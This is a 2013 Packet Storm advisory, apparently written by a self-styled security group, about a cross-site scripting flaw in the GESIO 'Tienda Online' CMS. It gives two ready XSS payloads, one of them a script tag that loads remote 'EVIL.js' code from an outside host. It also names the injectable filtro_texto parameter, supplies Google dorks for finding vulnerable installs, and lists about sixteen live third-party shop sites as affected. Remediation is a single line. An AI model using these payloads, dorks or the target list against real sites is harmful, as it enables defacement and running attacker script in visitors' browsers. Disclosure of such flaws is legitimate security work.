what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Tienda Online CMS Cross Site Scripting

Tienda Online CMS Cross Site Scripting
Posted Apr 19, 2013
Authored by Ivan Sanchez, Raul Diaz

Tienda Online CMS suffers from a cross site scripting vulnerability. The vendor has been notified of this issue. Note that this advisory has site-specific information.

tags | exploit, xss
SHA-256 | 93c112b74801b7c8122b5ecd4a34425111ec9659a7a46158160325e36fe93bcd

Tienda Online CMS Cross Site Scripting

Change Mirror Download
+=============================================================================================+
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +
+=============================================================================================+


Author(s): Ivan Sanchez & Raul Diaz

Product: Software Gestión GESIO
Web:http://www.gesio.com/
Versions: Modulo / Tienda Online - CM
Date: 18/04/2013

Vendor Notified: 18/04
Vendor Notified again: 19/04

Extract:
http://www.gesio.com/tienda-online-cms-89-50-431/
"Tu tienda Online conectada a tu facturación diaria. Facturarás con el mismo sistema que vendes online.
En GESIO® pensamos que un sistema de gestión online debe tener la posibilidad de desarrollar Tienda Online"


GOOGLE DORKS:
------------

allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO®

inurl:cms/site_0003


Sites affected
--------------------

ALL SITES USING THIS CM

http://www.qualitycenter.es/lp/
http://www.greenhabit.es/lp/
http://www.latiendadelhormigonimpreso.com/lp/
http://www.minisub.es/lp/
http://www.vitalarchery.com/lp/
http://www.palacios-congresos-es.com/lcli/
http://www.aulasconsoftware.com/lp/
http://www.arthulencourt.eu/lp/
http://www.soltercam.com/lp/
http://www.sol-i-vent.es/lp/
http://www.ale-hop.org/lp/
http://creugal-hobby.com/lp/
http://www.xipnet.es/lp/
http://www.canterbury.es/lp/
http://ociostock.com/lp/
http://guatebloem.com/productos_listado.php

much more....

Attacks >>>>>>>>>>>>>>>>>>>


XSS & REMOTE INJECTION CODE:
---------------------------

'">><marquee><h1>EvilCode Team</h1></marquee>

Or

"><script src=http://nullcode.com.ar/code/scripts/EVIL.js></script> EXTERNAL EVIL CODE !


Parameter Affected:
-------------------

--form 1 --

http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE

and much more...

Remediation:
------------

Could you please validate the input , sanitize each parameter.


Thanks you so much!



NULL CODE SERVICES [ www.evilcode.com.ar ] Hunting Security Bugs!
+=============================================================================================+
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +
+=============================================================================================+
Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close